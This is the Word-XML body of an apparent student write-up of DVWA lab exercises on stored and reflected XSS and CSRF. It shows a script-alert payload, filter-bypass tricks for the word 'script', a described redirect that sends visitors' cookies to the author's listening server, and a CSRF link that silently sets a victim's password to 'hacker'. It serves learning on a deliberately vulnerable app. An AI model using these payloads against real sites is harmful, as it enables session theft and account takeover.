      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function which is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>() to direct the user to another page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6505AE0E" w14:textId="24607A26" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>I also need to find a way to force the code to stay in the database permanently or until someone manually decides to remove it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243AC4D8" w14:textId="017B8DAB" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>DVWA offers me 2 inputs that I can POST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF6955C" w14:textId="2894C84D" w:rsidR="00F45DAB" w:rsidRPr="001022E9" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AF331D6" wp14:editId="092D43F5">
            <wp:extent cx="5725160" cy="24809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0F8D038B" w14:textId="280ED1E0" w:rsidR="0087543D" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>The good thing that the messages load as the same time with the actual website. Meaning the messages will load permanently just like we needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B963E36" w14:textId="304FBC89" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>For instance, in the Message field, if I added the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0099C0" w14:textId="3AEC1BBD" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r w:rsidRPr="00F45DAB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F45DAB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F45DAB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>‘Hello World’)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0E9F8" w14:textId="34A3959F" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>Every user that visits that website would get an alert</w:t>
      </w:r>
      <w:r w:rsidR="00607F8A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00607F8A">
        <w:t>says</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00607F8A">
        <w:t xml:space="preserve"> “Hello World” After the alert they can proceed to the website. The process would take place every time someone visits the website without any differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFCAA2" w14:textId="2CFD6279" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="0FB78997" w14:textId="0F2610DE" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="4261D22A" w14:textId="3DC873F8" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="4E15BB59" w14:textId="32C11F66" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="35DE4C45" w14:textId="2C20C018" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="7F762810" w14:textId="77777777" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="3FFB9363" w14:textId="315212AF" w:rsidR="005D793B" w:rsidRDefault="00607F8A" w:rsidP="005D793B">
      <w:r>
        <w:t>Anyways, the objective here is to redirect the user to different page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A9840C" w14:textId="74E057FB" w:rsidR="00607F8A" w:rsidRDefault="00607F8A" w:rsidP="001022E9">
      <w:r>
        <w:t>I do not have any website on mind so I will just create a server that listens to a specific port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C4067" w14:textId="1311AD4E" w:rsidR="00607F8A" w:rsidRDefault="005D793B" w:rsidP="001022E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63789AF0" wp14:editId="2EE7F0E7">
            <wp:extent cx="5732780" cy="19875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3C024C47" w14:textId="3F3508D9" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="70A14A7D" w14:textId="74BF582A" w:rsidR="00B05ED2" w:rsidRDefault="005D793B" w:rsidP="0087543D">
      <w:r>
        <w:t>Now I can redirect the users to here with their cookies using this code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA62BC8" w14:textId="16E8BAA2" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64FEBD86" wp14:editId="16C4CC92">
            <wp:extent cx="5732780" cy="22186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218690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DCC7FD" w14:textId="77777777" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="0087543D"/>
    <w:p w14:paraId="63FD1E6B" w14:textId="1C83AB8E" w:rsidR="00B05ED2" w:rsidRDefault="000D4482" w:rsidP="0087543D">
      <w:r>
        <w:t>Now I will get the cookies for all the users that visit the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02592322" w14:textId="36E448A6" w:rsidR="000D4482" w:rsidRDefault="000D4482" w:rsidP="0087543D">
      <w:r w:rsidRPr="000D4482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: I had to adjust the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxlength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for the Message input because it only allowed 50 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC3DED8" w14:textId="332A767D" w:rsidR="000D4482" w:rsidRDefault="000D4482" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66478152" wp14:editId="32925743">
            <wp:extent cx="5725160" cy="2298065"/>
            <wp:effectExtent l="0" t="0" r="889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034266B4" w14:textId="11F26CB8" w:rsidR="00B05ED2" w:rsidRPr="004D2B19" w:rsidRDefault="004D2B19" w:rsidP="0087543D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2B19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What did I just do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C418851" w14:textId="3FB6950C" w:rsidR="004D2B19" w:rsidRDefault="004D2B19" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">I just ruined the XSS (Stored) </w:t>
      </w:r>
      <w:r w:rsidR="00DE2C41">
        <w:t>page,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and I </w:t>
      </w:r>
      <w:r w:rsidR="00DE2C41">
        <w:t>cannot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> continue working on the other tasks.</w:t>
      </w:r>
      <w:r w:rsidR="00DE2C41">
        <w:t xml:space="preserve"> Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107CBF6" w14:textId="7A163CC8" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>Because I every time I click on that page it redirects me to another link. How can I fix that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4226AFBB" w14:textId="429D8A67" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>No idea yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D37A05" w14:textId="338A57D6" w:rsidR="00DE2C41" w:rsidRPr="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2C41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6A29FF" w14:textId="55D61C9C" w:rsidR="00B05ED2" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>I launched another DVWA server and could have forget about the broken DVWA and continue with the new one. Fortunately, I really wanted to solve that problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1214828A" w14:textId="1173B8D4" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>Here is what I did:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F864D7F" w14:textId="066286D9" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>I launched a new DVWA server and went to XSS Stored and I clicked on “Clear Guestbook”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDBDA2C" w14:textId="2471F1B1" w:rsidR="00DE2C41" w:rsidRDefault="000D5055" w:rsidP="0087543D">
      <w:r>
        <w:t>I sent this POST request to Burp Suite and it looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251E9C5" w14:textId="5B81F591" w:rsidR="000D5055" w:rsidRDefault="000D5055" w:rsidP="0087543D"/>
    <w:p w14:paraId="23B6B510" w14:textId="4973A2CC" w:rsidR="000D5055" w:rsidRDefault="000D5055" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="778EA9CF" wp14:editId="72E800CD">
            <wp:extent cx="5725160" cy="3562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a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E0586" w14:textId="77777777" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D"/>
    <w:p w14:paraId="76A82743" w14:textId="6A8F1A3A" w:rsidR="00B05ED2" w:rsidRDefault="000D5055" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">If I forward this, it will just delete all the messages for the new DVWA. However, that was not the point. I want to send the exact same POST request but for the old DVWA. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE236D" w14:textId="177E7FD8" w:rsidR="000D5055" w:rsidRDefault="000D5055" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">From the picture above, I replaced that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address of the old DVWA, and I also replaced the cookie with the old DVWA cookies, and I sent the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D2402" w14:textId="17A5BB86" w:rsidR="000D5055" w:rsidRDefault="000D5055" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">Now I </w:t>
      </w:r>
      <w:r w:rsidR="00C5773E">
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED780B">
        <w:t>click the XSS stored without being redirected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4692E56D" w14:textId="0C7853A1" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="7F2CF078" w14:textId="7A123981" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="4C17BF19" w14:textId="3EC6269B" w:rsidR="00C5773E" w:rsidRDefault="00C5773E" w:rsidP="00C5773E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc114777201"/>
      <w:r>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidR="003447C4">
        <w:t xml:space="preserve"> &amp; Reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Medium Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="28350B44" w14:textId="2E6B01C4" w:rsidR="00B05ED2" w:rsidRDefault="00C5773E" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">The difference between Low level and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Medium</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> level in XSS is always the same. They just block the word “script” to prevent the attacker from injecting some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> there. We can easily bypass this by duplicating the word script of putting some letter in upper case or put some space between the letters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2F84A8" w14:textId="40356424" w:rsidR="00C5773E" w:rsidRDefault="00C5773E" w:rsidP="0087543D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I tried these 2 tricks, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75000B56" wp14:editId="06EFFFCF">
            <wp:extent cx="5725160" cy="238569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r>
        <w:t>and both worked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF59C16" w14:textId="30AD009F" w:rsidR="00C5773E" w:rsidRDefault="00C5773E" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FE6FE7" wp14:editId="12B479B0">
            <wp:extent cx="5725160" cy="278320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14:paraId="4C007F58" w14:textId="4A222311" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="1AA823B0" w14:textId="0F517050" w:rsidR="00B05ED2" w:rsidRDefault="00C5773E" w:rsidP="0087543D">
      <w:r>
        <w:t>Yes, they blocked the word script but removing it would create another script tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472FD717" w14:textId="77777777" w:rsidR="00C5773E" w:rsidRDefault="00C5773E" w:rsidP="0087543D"/>
    <w:p w14:paraId="71B61948" w14:textId="71F4CEB9" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="57AB7AE1" w14:textId="6895E453" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="59653525" w14:textId="1AB4A2FC" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="1EDD6F85" w14:textId="300C1038" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="6AA07FF3" w14:textId="7C0460EA" w:rsidR="005751E7" w:rsidRDefault="005751E7" w:rsidP="005751E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc114777202"/>
      <w:r>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidR="005376FD">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:r w:rsidR="003447C4">
        <w:t>Reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – High Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="59D6F215" w14:textId="6D0C0E21" w:rsidR="00B05ED2" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">I went to this website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286FC35" w14:textId="1F265708" w:rsidR="005751E7" w:rsidRDefault="00000000" w:rsidP="005751E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:hyperlink r:id="rId93" w:history="1">
        <w:bookmarkStart w:id="35" w:name="_Toc114777203"/>
        <w:r w:rsidR="005751E7" w:rsidRPr="005A0D28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
        </w:r>
        <w:bookmarkEnd w:id="35"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="775E6529" w14:textId="7D325A28" w:rsidR="005751E7" w:rsidRDefault="005751E7" w:rsidP="005751E7">
      <w:r>
        <w:t>and found too many XSS cheat sheet codes that most of them work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB9B336" w14:textId="42ECFCBB" w:rsidR="005751E7" w:rsidRPr="005751E7" w:rsidRDefault="005751E7" w:rsidP="005751E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D44FF5D" wp14:editId="7A66558D">
            <wp:extent cx="5725160" cy="247269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1C1345C8" w14:textId="2A68BE7B" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="0F6050B3" w14:textId="0BA7E2A9" w:rsidR="00B05ED2" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">I tried a weird one which is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>drag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to execute and it worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF21C5" w14:textId="1F485F45" w:rsidR="005751E7" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A71F62F" wp14:editId="34CC5E3F">
            <wp:extent cx="4222115" cy="118491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2115" cy="1184910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F20EA" w14:textId="6CC658BD" w:rsidR="00B05ED2" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:r>
        <w:t>When I drug the name, alert pops up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10474E76" w14:textId="1A99CBD4" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="192D3805" w14:textId="76CACD89" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="5D3C0A09" w14:textId="6359F27B" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="0CB83227" w14:textId="1168B100" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="785B14A1" w14:textId="59335734" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="21A54354" w14:textId="5C14B465" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="21598074" w14:textId="01A19BFD" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="2FE9F514" w14:textId="3D6BD4A3" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="6CC9446C" w14:textId="0052C53F" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="0265A57B" w14:textId="108A1DE1" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="1DA8F973" w14:textId="7676779E" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="39D7F1DB" w14:textId="2C662DC2" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="66F64517" w14:textId="10C5667D" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="7FF988CC" w14:textId="2301ED93" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="1C03F6CC" w14:textId="3B2AF89A" w:rsidR="0055541D" w:rsidRDefault="00947003" w:rsidP="00947003">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc114777204"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CSRF (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="7A901152" w14:textId="77777777" w:rsidR="000441AC" w:rsidRPr="000441AC" w:rsidRDefault="000441AC" w:rsidP="000441AC"/>
    <w:p w14:paraId="6B1C63BB" w14:textId="77777777" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="000441AC">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:t>Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F20EBAF" w14:textId="3225AD88" w:rsidR="005751E7" w:rsidRPr="000441AC" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:pPr>
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A7F0AE1" w14:textId="7AACF202" w:rsidR="00947003" w:rsidRDefault="00947003" w:rsidP="00947003">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc114777205"/>
      <w:r>
        <w:t>CSRF – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="7BE47DA8" w14:textId="6A3C09BE" w:rsidR="00947003" w:rsidRDefault="00A04E1F" w:rsidP="00947003">
      <w:r>
        <w:t>We get this form to change the password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4EBF5A" w14:textId="38D8DCA4" w:rsidR="00A04E1F" w:rsidRPr="00947003" w:rsidRDefault="000441AC" w:rsidP="00947003">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BF295B7" wp14:editId="7925C3E3">
            <wp:extent cx="5725160" cy="2734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14:paraId="7D10D6DE" w14:textId="0A100BD9" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D"/>
    <w:p w14:paraId="24A3276D" w14:textId="7AD4755D" w:rsidR="0087543D" w:rsidRDefault="000441AC" w:rsidP="0087543D">
      <w:r>
        <w:t>When we click on change password, we notice that this GET request is being sent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A76A3E" w14:textId="27FFB51A" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B1D3C09" wp14:editId="498254E5">
            <wp:extent cx="5725160" cy="2552065"/>
            <wp:effectExtent l="0" t="0" r="889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0BBBB23C" w14:textId="3AB1502F" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="3F5DF13E" w14:textId="72691022" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D">
      <w:r>
        <w:t>From this, we find out that all we need to do to change the password is to execute this link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258655F6" w14:textId="22D4BD07" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D">
      <w:r w:rsidRPr="000441AC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http://localhost/vulnerabilities/csrf/?password_new=hacker&amp;password_conf=hacker&amp;Change=Change"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670A2EA7" w14:textId="3D0F3450" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The attacker can inject this link in any HTML page and find a way to force the victim to click the link. With that, the attacker made the victim to change their password without them realizing. Now the only one that has the victim’s password is the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B56BE5A" w14:textId="19D13BA5" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="0AE9DE38" w14:textId="48FEC370" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="0AE47FEA" w14:textId="7B0BDDD1" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="4C1C7D6A" w14:textId="22282CB9" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="000441AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc114777206"/>
      <w:r>
        <w:t>CSRF – Medium Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="7A4873D8" w14:textId="77777777" w:rsidR="000441AC" w:rsidRPr="000441AC" w:rsidRDefault="000441AC" w:rsidP="000441AC"/>
    <w:p w14:paraId="11498268" w14:textId="58C42145" w:rsidR="000441AC" w:rsidRDefault="00077604" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">The difference with this level and the previous one is that this level contains </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00077604">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because the developer wants to make sure that the request is matching the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773D431B" w14:textId="01881C85" w:rsidR="007512F8" w:rsidRPr="00077604" w:rsidRDefault="007512F8" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61D9F594" wp14:editId="0617E67B">
            <wp:extent cx="5731510" cy="3763645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="85" name="Picture 85" descr="Comparaison de re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aison de requêt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9974B87" w14:textId="1C39615F" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
